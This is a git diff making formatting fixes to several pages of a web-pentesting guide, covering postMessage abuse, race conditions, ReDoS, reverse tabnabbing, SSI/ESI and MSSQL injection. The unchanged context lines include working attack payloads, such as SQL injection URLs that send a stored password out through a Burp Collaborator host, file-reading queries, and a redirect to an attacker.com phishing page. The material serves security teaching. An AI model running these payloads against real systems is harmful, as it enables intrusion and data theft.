diff --git a/pentesting-web/pocs-and-polygloths-cheatsheet/README.md b/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
index 682c03cb..4cff3481 100644
--- a/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
+++ b/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
@@ -7,7 +7,7 @@ This **cheatsheet doesn't propose a comprehensive  list of tests for each vulner
 {% endhint %}
 
 {% hint style="danger" %}
-You **won't find Content-Type dependant injections like XXE**, as usually you will try those yourself if you find a request sending xml data. You **won't also find database injections **here as even if some content might be reflected it depends heavily on the backend DB technology and structure.
+You **won't find Content-Type dependant injections like XXE**, as usually you will try those yourself if you find a request sending xml data. You **won't also find database injections** here as even if some content might be reflected it depends heavily on the backend DB technology and structure.
 {% endhint %}
 
 ## Polygloths list
diff --git a/pentesting-web/postmessage-vulnerabilities.md b/pentesting-web/postmessage-vulnerabilities.md
index aea1de2b..96ed5b45 100644
--- a/pentesting-web/postmessage-vulnerabilities.md
+++ b/pentesting-web/postmessage-vulnerabilities.md
@@ -21,14 +21,14 @@ document.getElementById('idframe').contentWindow.postMessage('{"__proto__":{"isA
 window.postMessage('{"__proto__":{"isAdmin":True}}', 'https://company.com')
 ```
 
-Note that **targetOrigin **can be a '\*' or an URL like _https://company.com._\
+Note that **targetOrigin** can be a '\*' or an URL like _https://company.com._\
 __In the **second scenario**, the **message can only be sent to that domain** (even if the origin of the window object is different). \
-If the **wildcard **is used, **messages could be sent to any domain**, and will be sent to the origin of the Window object.
+If the **wildcard** is used, **messages could be sent to any domain**, and will be sent to the origin of the Window object.
 
-### Attacking iframe & wilcard in **targetOrigin **
+### Attacking iframe & wilcard in **targetOrigin**&#x20;
 
-As explained in [**this report**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) if you find a page that can be **iframed **(no `X-Frame-Header` protection) and that is **sending sensitive **message via **postMessage **using a **wildcard **(\*), you can **modify **the **origin **of the **iframe **and **leak **the **sensitive **message to a domain controlled by you.\
-Note that if the page can be iframed but the **targetOrigin **is** set to a URL and not to a wildcard**, this **trick won't work**.
+As explained in [**this report**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) if you find a page that can be **iframed** (no `X-Frame-Header` protection) and that is **sending sensitive** message via **postMessage** using a **wildcard** (\*), you can **modify** the **origin** of the **iframe** and **leak** the **sensitive** message to a domain controlled by you.\
+Note that if the page can be iframed but the **targetOrigin** is **set to a URL and not to a wildcard**, this **trick won't work**.
 
 ```markup
 <html>
@@ -60,31 +60,31 @@ window.addEventListener("message", (event) => {
 }, false);
 ```
 
-Note in this case how the **first thing** that the code is doing is **checking the origin**. This is terribly **important **mainly if the page is going to do** anything sensitive** with the received information (like changing a password). **If it doesn't check the origin, attackers can make victims send arbitrary data to this endpoints** and change the victims passwords (in this example).
+Note in this case how the **first thing** that the code is doing is **checking the origin**. This is terribly **important** mainly if the page is going to do **anything sensitive** with the received information (like changing a password). **If it doesn't check the origin, attackers can make victims send arbitrary data to this endpoints** and change the victims passwords (in this example).
 
 ### Enumeration
 
-In order to **find event listeners **in the current page you can:
+In order to **find event listeners** in the current page you can:
 
-* **Search **the JS code for** **`window.addEventListener` and `$(window).on` (_JQuery version_)
-* **Execute **in the developer tools console: `getEventListeners(window)`
+* **Search** the JS code for **** `window.addEventListener` and `$(window).on` (_JQuery version_)
+* **Execute** in the developer tools console: `getEventListeners(window)`
 
 ![](<../.gitbook/assets/image (618) (1) (1).png>)
 
-* **Go to **_Elements --> Event Listeners_ in the developer tools of the browser
+* **Go to** _Elements --> Event Listeners_ in the developer tools of the browser
 
 ![](<../.gitbook/assets/image (617).png>)
 
-* Use a **browser extension **like [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) or [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker). This browser extensions will **intercept all the messages** and show them to you.
+* Use a **browser extension** like [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) or [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker). This browser extensions will **intercept all the messages** and show them to you.
 
 ### addEventListener check origin bypasses
 
-* If **`indexOf()`** is used to **check **the **origin **of the PostMessage event, remember that it can be easily bypassed like in the following example: `("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")`\
+* If **`indexOf()`** is used to **check** the **origin** of the PostMessage event, remember that it can be easily bypassed like in the following example: `("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")`\
 
-* If **`search()`** is used to **validate **the **origin **could be insecure. According to the docs of `String.prototype.search()`, the method **takes a regular repression** object instead of a string. If anything other than regexp is passed, it will get implicitly converted into a regexp.\
-  In regular expression, **a dot (.) is treated as a wildcard**. An attacker can take advantage of it and **use **a **special domain **instead of the official one to bypass the validation, like in: `"https://www.safedomain.com".search("www.s.fedomain.com")`.\
+* If **`search()`** is used to **validate** the **origin** could be insecure. According to the docs of `String.prototype.search()`, the method **takes a regular repression** object instead of a string. If anything other than regexp is passed, it will get implicitly converted into a regexp.\
+  In regular expression, **a dot (.) is treated as a wildcard**. An attacker can take advantage of it and **use** a **special domain** instead of the official one to bypass the validation, like in: `"https://www.safedomain.com".search("www.s.fedomain.com")`.\
 
-* If **`escapeHtml`** function is used, the function does not create a `new` escaped object, instead it **overwrites properties **of the existing object. This means that if we are able to create an object with a controlled property that does not respond to `hasOwnProperty` it will not be escaped.
+* If **`escapeHtml`** function is used, the function does not create a `new` escaped object, instead it **overwrites properties** of the existing object. This means that if we are able to create an object with a controlled property that does not respond to `hasOwnProperty` it will not be escaped.
 
 ```javascript
 // Expected to fail:
@@ -101,7 +101,7 @@ result.message; // "'"<b>\"
 
 ### X-Frame-Header bypass
 
-In order to perform these attacks ideally you will be able to **put the victim web page** inside an `iframe`. But some headers like `X-Frame-Header` can **prevent **that **behaviour**.\
+In order to perform these attacks ideally you will be able to **put the victim web page** inside an `iframe`. But some headers like `X-Frame-Header` can **prevent** that **behaviour**.\
 In those scenarios you can still use a less stealthy attack. You can open a new tab to the vulnerable web application and communicate with it:
 
 ```markup
@@ -113,11 +113,11 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
 
 ### postMessage to Prototype Pollution and/or XSS
 
-In scenarios where the data sent through `postMessage` is executed by JS, you can **iframe **the **page **and **exploit **the **prototype pollution/XSS **sending the exploit via `postMessage`.
+In scenarios where the data sent through `postMessage` is executed by JS, you can **iframe** the **page** and **exploit** the **prototype pollution/XSS** sending the exploit via `postMessage`.
 
 A couple of **very good explained XSS though `postMessage`** can be found in [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)
 
-Example of an exploit to abuse** Prototype Pollution and then XSS** through a `postMessage` to an `iframe`:
+Example of an exploit to abuse **Prototype Pollution and then XSS** through a `postMessage` to an `iframe`:
 
 ```markup
 <html>
diff --git a/pentesting-web/race-condition.md b/pentesting-web/race-condition.md
index 850c9293..b4943118 100644
--- a/pentesting-web/race-condition.md
+++ b/pentesting-web/race-condition.md
@@ -2,18 +2,18 @@
 
 ## Anything limited by a number of attempts
 
-Race conditions are **vulnerabilities **that **appear **in webs that** limit the number of times you can perform an action**. A very easy example can be found in [**this report**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43).
+Race conditions are **vulnerabilities** that **appear** in webs that **limit the number of times you can perform an action**. A very easy example can be found in [**this report**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43).
 
 ## Using several times a one-time use code
 
-When you make the web page perform some **action **that** should be done only once**, but if the action is done **several times** you will be **benefited**, you really need to try a **Race condicion**.\
-Most of the time this is directly related with **money **(if an action is made you get X money, so let's try to make it several time very quickly)**.**
+When you make the web page perform some **action** that **should be done only once**, but if the action is done **several times** you will be **benefited**, you really need to try a **Race condicion**.\
+Most of the time this is directly related with **money** (if an action is made you get X money, so let's try to make it several time very quickly)**.**
 
 ### **Using from the same account the same code several times**
 
-For example, in [**this bug** ](https://hackerone.com/reports/759247)the hunter was able to** load the money inside a gift card several times.**
+For example, in [**this bug** ](https://hackerone.com/reports/759247)the hunter was able to **load the money inside a gift card several times.**
 
-This is the **turbo intruder **script used to **test **the **race condition **of the mentioned writeup:
+This is the **turbo intruder** script used to **test** the **race condition** of the mentioned writeup:
 
 ```python
 def queueRequests(target, wordlists):
@@ -38,7 +38,7 @@ def handleResponse(req, interesting):
     table.add(req)
 ```
 
-Using also BURP you could also send the **request **to **Intruder**, set the **number of threads **to **30** inside the **Options menu and, **select as payload **Null payloads **and generate** 30.**
+Using also BURP you could also send the **request** to **Intruder**, set the **number of threads** to **30** inside the **Options menu and,** select as payload **Null payloads** and generate **30.**
 
 ### **Using the same code from different accounts**
 
@@ -65,16 +65,16 @@ def handleResponse(req, interesting):
 
 ### OAuth2 eternal persistence
 
-There are several [**OAUth providers**](https://en.wikipedia.org/wiki/List_of_OAuth_providers). Theses services will allow you to create an application and authenticate users that the provider has registered. In order to do so, the **client **will need to **permit your application **to access some of their data inside of the **OAUth provider**.\
+There are several [**OAUth providers**](https://en.wikipedia.org/wiki/List\_of\_OAuth\_providers). Theses services will allow you to create an application and authenticate users that the provider has registered. In order to do so, the **client** will need to **permit your application** to access some of their data inside of the **OAUth provider**.\
 So, until here just a common login with google/linkdin/github... where you aer prompted with a page saying: "_Application \<InsertCoolName> wants to access you information, do you want to allow it?_"
 
 #### Race Condition in `authorization_code`
 
-The **problem **appears when you **accept it** and automatically sends a  **`authorization_code`** to the malicious application. Then, this **application abuses a Race Condition in the OAUth service provider to generate more that one AT/RT** (_Authentication Token/Refresh Token_) from the **`authorization_code`** for your account. Basically, it will abuse the fact that you have accept the application to access your data to **create several accounts**. Then, if you **stop allowing the application to access your data one pair of AT/RT will be deleted, but the other ones will still be valid**.
+The **problem** appears when you **accept it** and automatically sends a  **`authorization_code`** to the malicious application. Then, this **application abuses a Race Condition in the OAUth service provider to generate more that one AT/RT** (_Authentication Token/Refresh Token_) from the **`authorization_code`** for your account. Basically, it will abuse the fact that you have accept the application to access your data to **create several accounts**. Then, if you **stop allowing the application to access your data one pair of AT/RT will be deleted, but the other ones will still be valid**.
 
 #### Race Condition in `Refresh Token`
 
-Once you have** obtained a valid RT** you could try to **abuse it to generate several AT/RT **and **even if the user cancels the permissions** for the malicious application to access his data, **several RTs will still be valid. **
+Once you have **obtained a valid RT** you could try to **abuse it to generate several AT/RT** and **even if the user cancels the permissions** for the malicious application to access his data, **several RTs will still be valid.**&#x20;
 
 ## References
 
diff --git a/pentesting-web/regular-expression-denial-of-service-redos.md b/pentesting-web/regular-expression-denial-of-service-redos.md
index 258e2410..707ecd51 100644
--- a/pentesting-web/regular-expression-denial-of-service-redos.md
+++ b/pentesting-web/regular-expression-denial-of-service-redos.md
@@ -2,15 +2,15 @@
 
 ## Introduction
 
-**Copied from **[**https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service\_-\_ReDoS**](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service\_-\_ReDoS)****
+**Copied from** [**https://owasp.org/www-community/attacks/Regular\_expression\_Denial\_of\_Service\_-\_ReDoS**](https://owasp.org/www-community/attacks/Regular\_expression\_Denial\_of\_Service\_-\_ReDoS)****
 
-The **Regular expression Denial of Service (ReDoS)** is a [Denial of Service](https://owasp.org/www-community/attacks/Denial_of_Service) attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time.
+The **Regular expression Denial of Service (ReDoS)** is a [Denial of Service](https://owasp.org/www-community/attacks/Denial\_of\_Service) attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time.
 
 ### Description
 
-#### The problematic Regex naïve algorithm <a href="the-problematic-regex-naive-algorithm" id="the-problematic-regex-naive-algorithm"></a>
+#### The problematic Regex naïve algorithm <a href="#the-problematic-regex-naive-algorithm" id="the-problematic-regex-naive-algorithm"></a>
 
-The Regular Expression naïve algorithm builds a [Nondeterministic Finite Automaton (NFA)](https://en.wikipedia.org/wiki/Nondeterministic_finite_state_machine), which is a finite state machine where for each pair of state and input symbol there may be several possible next states. Then the engine starts to make transition until the end of the input. Since there may be several possible next states, a deterministic algorithm is used. This algorithm tries one by one all the possible paths (if needed) until a match is found (or all the paths are tried and fail).
+The Regular Expression naïve algorithm builds a [Nondeterministic Finite Automaton (NFA)](https://en.wikipedia.org/wiki/Nondeterministic\_finite\_state\_machine), which is a finite state machine where for each pair of state and input symbol there may be several possible next states. Then the engine starts to make transition until the end of the input. Since there may be several possible next states, a deterministic algorithm is used. This algorithm tries one by one all the possible paths (if needed) until a match is found (or all the paths are tried and fail).
 
 For example, the Regex `^(a+)+$` is represented by the following NFA:
 
@@ -18,9 +18,9 @@ For example, the Regex `^(a+)+$` is represented by the following NFA:
 
 For the input `aaaaX` there are 16 possible paths in the above graph. But for `aaaaaaaaaaaaaaaaX` there are 65536 possible paths, and the number is double for each additional `a`. This is an extreme case where the naïve algorithm is problematic, because it must pass on many many paths, and then fail.
 
-Notice, that not all algorithms are naïve, and actually Regex algorithms can be written in an efficient way. Unfortunately, most Regex engines today try to solve not only “pure” Regexes, but also “expanded” Regexes with “special additions”, such as back-references that cannot be always be solved efficiently (see **Patterns for non-regular languages** in [Wiki-Regex](https://en.wikipedia.org/wiki/Regular_expression) for some more details). So even if the Regex is not “expanded”, a naïve algorithm is used.
+Notice, that not all algorithms are naïve, and actually Regex algorithms can be written in an efficient way. Unfortunately, most Regex engines today try to solve not only “pure” Regexes, but also “expanded” Regexes with “special additions”, such as back-references that cannot be always be solved efficiently (see **Patterns for non-regular languages** in [Wiki-Regex](https://en.wikipedia.org/wiki/Regular\_expression) for some more details). So even if the Regex is not “expanded”, a naïve algorithm is used.
 
-#### Evil Regexes <a href="evil-regexes" id="evil-regexes"></a>
+#### Evil Regexes <a href="#evil-regexes" id="evil-regexes"></a>
 
 A Regex is called “evil” if it can stuck on crafted input.
 
diff --git a/pentesting-web/reverse-tab-nabbing.md b/pentesting-web/reverse-tab-nabbing.md
index 75d0affc..b587feb2 100644
--- a/pentesting-web/reverse-tab-nabbing.md
+++ b/pentesting-web/reverse-tab-nabbing.md
@@ -7,7 +7,7 @@ If the page doesn't have **`rel="opener"` but contains `target="_blank"` it also
 
 A regular way to abuse this behaviour would be to **change the location of the original web** via `window.opener.location = https://attacker.com/victim.html` to a web controlled by the attacker that **looks like the original one**, so it can **imitate** the **login** **form** of the original website and ask for credentials to the user.
 
-However, note that as the **attacker now can control the window object of the original website **he can abuse it in other ways to perform **stealthier attacks** (maybe modifying javascript events to ex-filtrate info to a server controlled by him?)
+However, note that as the **attacker now can control the window object of the original website** he can abuse it in other ways to perform **stealthier attacks** (maybe modifying javascript events to ex-filtrate info to a server controlled by him?)
 
 ## Overview
 
@@ -15,15 +15,15 @@ However, note that as the **attacker now can control the window object of the or
 
 Link between parent and child pages when prevention attribute is not used:
 
-![](https://owasp.org/www-community/assets/images/TABNABBING_OVERVIEW_WITH_LINK.png)
+![](https://owasp.org/www-community/assets/images/TABNABBING\_OVERVIEW\_WITH\_LINK.png)
 
 ### Without back link
 
 Link between parent and child pages when prevention attribute is used:
 
-![](https://owasp.org/www-community/assets/images/TABNABBING_OVERVIEW_WITHOUT_LINK.png)
+![](https://owasp.org/www-community/assets/images/TABNABBING\_OVERVIEW\_WITHOUT\_LINK.png)
 
-### Examples <a href="examples" id="examples"></a>
+### Examples <a href="#examples" id="examples"></a>
 
 Create the following pages in a folder and run a web server with `python3 -m http.server`\
 Then, **access** `http://127.0.0.1:8000/`vulnerable.html, **click** on the link and note how the **original** **website** **URL** **changes**.
@@ -64,7 +64,7 @@ Then, **access** `http://127.0.0.1:8000/`vulnerable.html, **click** on the link
 ```
 {% endcode %}
 
-### Accessible properties <a href="accessible-properties" id="accessible-properties"></a>
+### Accessible properties <a href="#accessible-properties" id="accessible-properties"></a>
 
 The malicious site can only access to the following properties from the **opener** javascript object reference (that is in fact a reference to a **window** javascript class instance) in case of **cross origin** (cross domains) access:
 
@@ -80,7 +80,7 @@ If the domains are the same then the malicious site can access all the propertie
 
 ## Prevention
 
-Prevention information are documented into the [HTML5 Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/HTML5\_Security_Cheat_Sheet.html#tabnabbing).
+Prevention information are documented into the [HTML5 Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/HTML5\_Security\_Cheat\_Sheet.html#tabnabbing).
 
 ## References
 
diff --git a/pentesting-web/saml-attacks/saml-basics.md b/pentesting-web/saml-attacks/saml-basics.md
index ea717a47..63712bdf 100644
--- a/pentesting-web/saml-attacks/saml-basics.md
+++ b/pentesting-web/saml-attacks/saml-basics.md
@@ -8,7 +8,7 @@ SAML transactions use Extensible Markup Language (XML) for standardized communic
 
 ## SAML vs. OAuth
 
-OAuth is a slightly newer standard that was co-developed by Google and Twitter to enable streamlined internet logins. OAuth uses a similar methodology as SAML to share login information. **SAML provides more control **to enterprises to keep their SSO logins more secure, whereas** OAuth is better on mobile and uses JSON**.
+OAuth is a slightly newer standard that was co-developed by Google and Twitter to enable streamlined internet logins. OAuth uses a similar methodology as SAML to share login information. **SAML provides more control** to enterprises to keep their SSO logins more secure, whereas **OAuth is better on mobile and uses JSON**.
 
 ## Schema
 
diff --git a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
index c7b87d73..d5331ddf 100644
--- a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
+++ b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
@@ -2,7 +2,7 @@
 
 ## Server Side Inclusion Basic Information
 
-SSI (Server Side Includes) are directives that are** placed in HTML pages, and evaluated on the server** while the pages are being served. They let you **add dynamically generated content **to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.\
+SSI (Server Side Includes) are directives that are **placed in HTML pages, and evaluated on the server** while the pages are being served. They let you **add dynamically generated content** to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.\
 For example, you might place a directive into an existing HTML page, such as:
 
 `<!--#echo var="DATE_LOCAL" -->`
@@ -100,7 +100,7 @@ This will send debug information included in the response:
 
 ### ESI + XSLT = XXE
 
-It is also possible to add** **_**eXtensible Stylesheet Language Transformations (XSLT)**_** **based ESI includes by specifying the `xslt` value to the _dca_ parameter. The following include will cause the HTTP surrogate to request the XML and XSLT file. The XSLT file is then used to filter the XML file. This XML file can be used to perform _XML External Entity (XXE)_ attacks. This allows attackers to perform SSRF attacks, which is not very useful since this must be performed through ESI includes, which is an SSRF vector itself. External DTDs are not parsed since the underlying library (Xalan) has no support for it. This means we cannot extract local files.
+It is also possible to add ** **_**eXtensible Stylesheet Language Transformations (XSLT)**_** ** based ESI includes by specifying the `xslt` value to the _dca_ parameter. The following include will cause the HTTP surrogate to request the XML and XSLT file. The XSLT file is then used to filter the XML file. This XML file can be used to perform _XML External Entity (XXE)_ attacks. This allows attackers to perform SSRF attacks, which is not very useful since this must be performed through ESI includes, which is an SSRF vector itself. External DTDs are not parsed since the underlying library (Xalan) has no support for it. This means we cannot extract local files.
 
 ```markup
 <esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
diff --git a/pentesting-web/sql-injection/README.md b/pentesting-web/sql-injection/README.md
index d9e3b835..c401f53b 100644
--- a/pentesting-web/sql-injection/README.md
+++ b/pentesting-web/sql-injection/README.md
@@ -348,7 +348,7 @@ The database will **check** if the introduced **username** **exists** inside the
 
 More info: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html](https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html) & [https://resources.infosecinstitute.com/sql-truncation-attack/#gref](https://resources.infosecinstitute.com/sql-truncation-attack/#gref)
 
-_Note: This attack will no longer work as described above in latest MySQL installations. While comparisons still ignore trailing whitespace by default, attempting to insert a string that is longer than the length of a field will result in an error, and the insertion will fail. For more information about about this check _[_https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation_](https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation)__
+_Note: This attack will no longer work as described above in latest MySQL installations. While comparisons still ignore trailing whitespace by default, attempting to insert a string that is longer than the length of a field will result in an error, and the insertion will fail. For more information about about this check_ [_https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation_](https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation)__
 
 ### MySQL Insert time based checking
 
diff --git a/pentesting-web/sql-injection/mssql-injection.md b/pentesting-web/sql-injection/mssql-injection.md
index 2f1693e8..5de2f822 100644
--- a/pentesting-web/sql-injection/mssql-injection.md
+++ b/pentesting-web/sql-injection/mssql-injection.md
@@ -2,11 +2,11 @@
 
 ## Active Directory enumeration
 
-It may be possible to** enumerate domain users via SQL injection inside a MSSQL** server using the following MSSQL functions:
+It may be possible to **enumerate domain users via SQL injection inside a MSSQL** server using the following MSSQL functions:
 
-* `master.dbo.fn_varbintohexstr(SUSER_SID('MEGACORP\Administrator'))`: If you know the name of the domain (_MEGACORP _in this example) this function will return the **SID of the user Administrator **in hex format. This will look like `0x01050000000[...]0000f401`, note how the **last 4 bytes** are the number **500** in **big endian **format, which is the **common ID of the user administrator**. \
-  This function will allow you to** know the ID of the domain** (all the bytes except of the last 4).
-* `SUSER_SNAME(0x01050000000[...]0000e803)` : This function will return the **username of the ID indicated **(if any), in this case **0000e803** in big endian == **1000 **(usually this is the ID of the first regular user ID created). Then you can imagine that you can bruteforce user IDs from 1000 to 2000 and probably get all the usernames of the users of the domain. For example using a function like the following one:
+* `master.dbo.fn_varbintohexstr(SUSER_SID('MEGACORP\Administrator'))`: If you know the name of the domain (_MEGACORP_ in this example) this function will return the **SID of the user Administrator** in hex format. This will look like `0x01050000000[...]0000f401`, note how the **last 4 bytes** are the number **500** in **big endian** format, which is the **common ID of the user administrator**. \
+  This function will allow you to **know the ID of the domain** (all the bytes except of the last 4).
+* `SUSER_SNAME(0x01050000000[...]0000e803)` : This function will return the **username of the ID indicated** (if any), in this case **0000e803** in big endian == **1000** (usually this is the ID of the first regular user ID created). Then you can imagine that you can bruteforce user IDs from 1000 to 2000 and probably get all the usernames of the users of the domain. For example using a function like the following one:
 
 ```python
 def get_sid(n):
@@ -18,7 +18,7 @@ def get_sid(n):
 
 ## **Alternative Error-Based vectors**
 
-**(From **[**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**) **Error-based SQL injections typically resemble constructions such as «+AND+1=@@version–» and variants based on the «OR» operator. Queries containing such expressions are usually blocked by WAFs. As a bypass, concatenate a string using the %2b character with the result of specific function calls that trigger a data type conversion error on sought-after data.
+**(From** [**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**)** Error-based SQL injections typically resemble constructions such as «+AND+1=@@version–» and variants based on the «OR» operator. Queries containing such expressions are usually blocked by WAFs. As a bypass, concatenate a string using the %2b character with the result of specific function calls that trigger a data type conversion error on sought-after data.
 
 Some examples of such functions:
 
@@ -40,9 +40,9 @@ https://vuln.app/getItem?id=1'%2buser_name(@@version)--
 
 ## SSRF
 
-#### fn_trace_gettabe, fn_xe_file_target_read_file, fn_get_audit_file (from [here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/))
+#### fn\_trace\_gettabe, fn\_xe\_file\_target\_read\_file, fn\_get\_audit\_file (from [here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/))
 
- `fn_xe_file_target_read_file()` example:
+&#x20;`fn_xe_file_target_read_file()` example:
 
 ```
 https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null))
@@ -74,7 +74,7 @@ https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2
 
 
 
-**Information taken from **[**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL)****
+**Information taken from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL)****
 
 ****[Microsoft SQL Server provides multiple extended stored procedures that allow you to interact with not only the network but also the file system and even the ](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[Windows Registry](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/).
 
@@ -86,7 +86,7 @@ Alternatively, you could also use a User Defined Function in MSSQL to load a DLL
 
 Let’s look at the above techniques in a little more detail.
 
-#### Limited SSRF using master..xp_dirtree (and other file stored procedures) <a href="limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures" id="limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures"></a>
+#### Limited SSRF using master..xp\_dirtree (and other file stored procedures) <a href="#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures" id="limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures"></a>
 
 The most common method to make a network call you will come across using MSSQL is the usage of the Stored Procedure `xp_dirtree`, which weirdly is undocumented by Microsoft, which caused it to be [documented by other folks on the Internet](https://www.baronsoftware.com/Blog/sql-stored-procedures-get-folder-files/). This method has been used in [multiple examples](https://www.notsosecure.com/oob-exploitation-cheatsheet/) of [Out of Band Data exfiltration](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/) posts on the Internet.
 
@@ -104,7 +104,7 @@ Much like MySQL’s `LOAD_FILE`, you can use `xp_dirtree` to make a network requ
 
 There are other stored procedures [like `master..xp_fileexist` ](https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx)etc. as well that can be used for similar results.
 
-#### master..xp_cmdshell <a href="master-xp-cmdshell" id="master-xp-cmdshell"></a>
+#### master..xp\_cmdshell <a href="#master-xp-cmdshell" id="master-xp-cmdshell"></a>
 
 The extended stored procedure [`xp_cmdshell` spawns a Windows command shell and executes the string passed to it, returning any rows of text](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql). This command is run as the SQL Server service account.
 
@@ -136,7 +136,7 @@ GO
 
 You can additionally pass other headers and change the HTTP method as well to access data on services that need a POST or PUT instead of a GET like in the case of IMDSv2 for AWS or a special header like `Metadata: true` in the case of Azure or the `Metadata-Flavor: Google` for GCP.
 
-#### MSSQL User Defined Function - SQLHttp <a href="mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
+#### MSSQL User Defined Function - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
 
 It is fairly straightforward to write a CLR UDF (Common Language Runtime User Defined Function - code written with any of the .NET languages and compiled into a DLL) and load it within MSSQL for custom functions. This, however, requires `dbo` access so may not work unless the web application connection to the database as `sa` or an Administrator role.
 
@@ -180,7 +180,7 @@ SELECT dbo.http(@url);
 
 ## **Quick exploitation: Retrieve an entire table in one query**
 
-**(From **[**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**)** There exist two simple ways to retrieve the entire contents of a table in one query — the use of the FOR XML or the FOR JSON clause. The FOR XML clause requires a specified mode such as «raw», so in terms of brevity FOR JSON outperforms it.
+**(From** [**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**)** There exist two simple ways to retrieve the entire contents of a table in one query — the use of the FOR XML or the FOR JSON clause. The FOR XML clause requires a specified mode such as «raw», so in terms of brevity FOR JSON outperforms it.
 
 The query to retrieve the schema, tables and columns from the current database:
 
@@ -200,7 +200,7 @@ https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_n
 
 ## **Reading local files**
 
-**(From **[**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**) **An example of retrieving a local file `C:\Windows\win.ini` using the function OpenRowset():
+**(From** [**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**)** An example of retrieving a local file `C:\Windows\win.ini` using the function OpenRowset():
 
 ```
 https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+’C:\Windows\win.ini’,SINGLE_CLOB)+R(x)),null,null
@@ -218,7 +218,7 @@ https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\w
 
 ## **Retrieving the current query**
 
-**(From **[**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**) **The current SQL query being executed can be retrieved from access `sys.dm_exec_requests` and `sys.dm_exec_sql_text`:
+**(From** [**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**)** The current SQL query being executed can be retrieved from access `sys.dm_exec_requests` and `sys.dm_exec_sql_text`:
 
 ```
 https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null
@@ -230,7 +230,7 @@ https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_
 
 ## **Little tricks for WAF bypasses**
 
-**(From **[**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**) **Non-standard whitespace characters: %C2%85 или %C2%A0:
